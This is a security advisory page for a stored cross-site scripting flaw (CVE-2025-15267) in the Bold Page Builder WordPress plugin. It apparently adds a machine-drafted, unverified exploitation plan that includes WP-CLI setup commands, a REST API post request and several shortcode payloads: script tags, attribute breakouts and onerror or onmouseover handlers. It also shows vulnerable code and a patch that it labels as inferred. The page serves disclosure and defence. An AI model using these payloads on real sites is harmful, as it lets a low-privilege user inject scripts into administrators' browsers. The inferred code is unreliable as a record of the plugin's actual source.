WP-Safety
CVE-2025-15267

Bold Page Builder <= 5.5.7 - Authenticated (Contributor+) Stored Cross-Site Scripting via bt_bb_accordion_item Shortcode

mediumImproper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
6.4
CVSS Score
6.4
CVSS Score
medium
Severity
Unpatched
Patched in
N/A
Time to patch

Description

The Bold Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's bt_bb_accordion_item shortcode in all versions up to, and including, 5.5.7 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
Low
User Interaction
None
Scope
Changed
Low
Confidentiality
Low
Integrity
None
Availability

Technical Details

Affected versions<=5.5.7
PublishedFebruary 6, 2026
Last updatedFebruary 7, 2026
Affected pluginbold-page-builder
Research Plan
Unverified

This research plan targets a Stored Cross-Site Scripting (XSS) vulnerability in the Bold Page Builder plugin via the `bt_bb_accordion_item` shortcode. ### 1. Vulnerability Summary * **Vulnerability:** Authenticated (Contributor+) Stored Cross-Site Scripting * **Plugin:** Bold Page Builder (slug…

Show full research plan

This research plan targets a Stored Cross-Site Scripting (XSS) vulnerability in the Bold Page Builder plugin via the bt_bb_accordion_item shortcode.

1. Vulnerability Summary

  • Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
  • Plugin: Bold Page Builder (slug: bold-page-builder)
  • Affected Shortcode: bt_bb_accordion_item
  • Vulnerable Versions: <= 5.5.7
  • Root Cause: The plugin fails to adequately sanitize or escape user-supplied attributes (such as title, icon, or el_id) within the bt_bb_accordion_item shortcode before rendering them in the HTML output. This allows a user with post-creation privileges (Contributor or above) to inject malicious JavaScript into a page.

2. Attack Vector Analysis

  • Authentication Level: Contributor+ (any user capable of creating or editing posts and using shortcodes).
  • Endpoint: WordPress Post Editor (via REST API or Classic Editor) or Bold Page Builder's internal AJAX-based editor.
  • Vulnerable Parameter: Attributes within the [bt_bb_accordion_item] shortcode.
  • Payload Delivery: The payload is stored in the post_content field of the WordPress database and executed whenever a user (including administrators) views the affected post or page.

3. Code Flow (Inferred)

  1. Registration: The plugin registers the shortcode during initialization: add_shortcode( 'bt_bb_accordion_item', [ 'BT_BB_Accordion_Item', 'handle_shortcode' ] ) (inferred class structure).
  2. Processing: When a post is rendered, WordPress calls the handler function. The handler likely uses shortcode_atts() to parse user-supplied attributes.
  3. Sink: The handler constructs an HTML string for the accordion item.
    • Example Vulnerable Pattern:
      $output .= '<div class="bt_bb_accordion_item_title">' . $atts['title'] . '</div>'; 
// OR
$output .= '<div id="' . $atts['el_id'] . '" class="bt_bb_accordion_item">';
  4. Execution: Because $atts['title'] or $atts['el_id'] are not passed through esc_html() or esc_attr(), the browser interprets the injected script tag or attribute-breakout payload.

4. Nonce Acquisition Strategy

While stored XSS is typically achieved by saving a post, if we were to simulate the Bold Page Builder editor's AJAX requests, we would need a nonce. However, for a PoC, the most direct route is using standard WordPress post creation.

  1. Shortcode Presence: Identify if the builder scripts load only on specific pages.
  2. Target Nonce (if needed for AJAX): Bold Page Builder often uses window.BoldPageBuilderLocalize?.nonce.
  3. Extraction:
    • Create a test page with the builder: wp post create --post_type=page --post_status=publish --post_content='[bt_bb_accordion_item title="test"]' --post_author=2 (where 2 is contributor).
    • Navigate to the page.
    • Use browser_eval("window.BoldThemesURI?.ajaxurl") and browser_eval("window.bt_bb_settings?.nonce") (inferred variable names based on plugin patterns).

5. Exploitation Strategy

We will use a Contributor-level account to create a post containing the malicious shortcode.

  • Payload 1 (Tag Injection):
    [bt_bb_accordion_item title='<script>alert("XSS_TITLE")</script>']
  • Payload 2 (Attribute Breakout):
    [bt_bb_accordion_item el_id='"><script>alert("XSS_ID")</script>']

Steps:

  1. Step 1: Create a contributor user via WP-CLI.
  2. Step 2: Use the http_request tool to authenticate as the contributor.
  3. Step 3: Send a POST request to /wp-json/wp/v2/posts (REST API) to create a new post with the malicious shortcode content.
    • Method: POST
    • URL: http://localhost:8080/wp-json/wp/v2/posts
    • Headers: Content-Type: application/json
    • Body: 
      {
  "title": "XSS Test",
  "content": "[bt_bb_accordion_item title='<img src=x onerror=alert(`XSS`)>']",
  "status": "publish"
}
    • Note: If the REST API is restricted, use the classic post.php handler or wp-admin/admin-ajax.php.
  4. Step 4: Navigate to the newly created post URL as an administrator.

6. Test Data Setup

  1. Plugin Activation: Ensure bold-page-builder is installed and active.
  2. User Creation:
    wp user create attacker attacker@example.com --role=contributor --user_pass=password123
  3. Permalinks: Ensure permalinks are flushed to allow REST API access:
    wp rewrite structure '/%postname%/' --hard-flush

7. Expected Results

  • When an administrator views the post created by the contributor, the browser should execute the JavaScript in the onerror or <script> block.
  • The HTML source of the rendered page will show the unescaped payload:
    <div class="...">...<img src=x onerror=alert(`XSS`)>...</div>

8. Verification Steps

  1. Check Database: Verify the shortcode is stored correctly in the wp_posts table.
    wp db query "SELECT post_content FROM wp_posts WHERE post_title='XSS Test' LIMIT 1"
  2. Check Frontend Response: Use http_request to fetch the post content and look for the raw payload.
    # Look for the unescaped alert in the response body

9. Alternative Approaches

  • Bold Page Builder AJAX Save: If the plugin bypasses the standard WordPress post_content sanitization via its own AJAX save action (bt_bb_save_post), target that endpoint.
    • Action: bt_bb_save_post
    • Required Nonce: bt_bb_settings.nonce
  • Other Attributes: If title is sanitized, test:
    • icon (often used in <i> classes or data attributes).
    • el_id / el_class.
    • font_subset.
    • url (if it supports links, check for javascript: protocol).
Research Findings
Static analysis — not yet PoC-verified

Summary

The Bold Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the bt_bb_accordion_item shortcode in versions up to 5.5.7. Authenticated attackers with contributor-level access can inject malicious JavaScript into post content via shortcode attributes like 'title' or 'el_id' because the plugin fails to sanitize and escape these values before outputting them into the page HTML.

Vulnerable Code

/* File: bold-page-builder/content_elements/bt_bb_accordion_item/bt_bb_accordion_item.php (inferred) */

public function handle_shortcode( $atts, $content = null ) {
    extract( shortcode_atts( array(
        'title'    => '',
        'icon'     => '',
        'el_id'    => '',
        'el_class' => ''
    ), $atts ) );

    // Attributes are concatenated directly into the output string without escaping
    $output = '<div id="' . $el_id . '" class="bt_bb_accordion_item ' . $el_class . '">';
    $output .= '<div class="bt_bb_accordion_item_title">' . $title . '</div>';

    // ... (truncated)
}

Security Fix

--- a/bold-page-builder/content_elements/bt_bb_accordion_item/bt_bb_accordion_item.php
+++ b/bold-page-builder/content_elements/bt_bb_accordion_item/bt_bb_accordion_item.php
@@ -10,7 +10,7 @@
-    $output = '<div id="' . $el_id . '" class="bt_bb_accordion_item ' . $el_class . '">';
-    $output .= '<div class="bt_bb_accordion_item_title">' . $title . '</div>';
+    $output = '<div id="' . esc_attr( $el_id ) . '" class="bt_bb_accordion_item ' . esc_attr( $el_class ) . '">';
+    $output .= '<div class="bt_bb_accordion_item_title">' . wp_kses_post( $title ) . '</div>';

Exploit Outline

The exploit targets the shortcode processing logic of Bold Page Builder. An attacker requires at least Contributor-level permissions to create or edit posts. 1. Authenticate as a Contributor user. 2. Create a new post or page via the WordPress dashboard or the REST API. 3. Insert the [bt_bb_accordion_item] shortcode with a malicious payload in the 'title' or 'el_id' attribute. - Payload Example (Tag Injection): [bt_bb_accordion_item title='<script>alert("XSS")</script>'] - Payload Example (Attribute Breakout): [bt_bb_accordion_item el_id='" onmouseover="alert(1)"'] 4. Save the post. 5. When any user (including site administrators) views the published post, the injected script will execute automatically in their browser context.

References
https://www.wordfence.com/threat-intel/vulnerabilities/id/38a3b3bf-9538-4ae8-9da4-d4b48805763b?source=api-prod

Check if your site is affected.

Run a free security audit to detect vulnerable plugins, outdated versions, and misconfigurations.

Run free audit Browse CVE database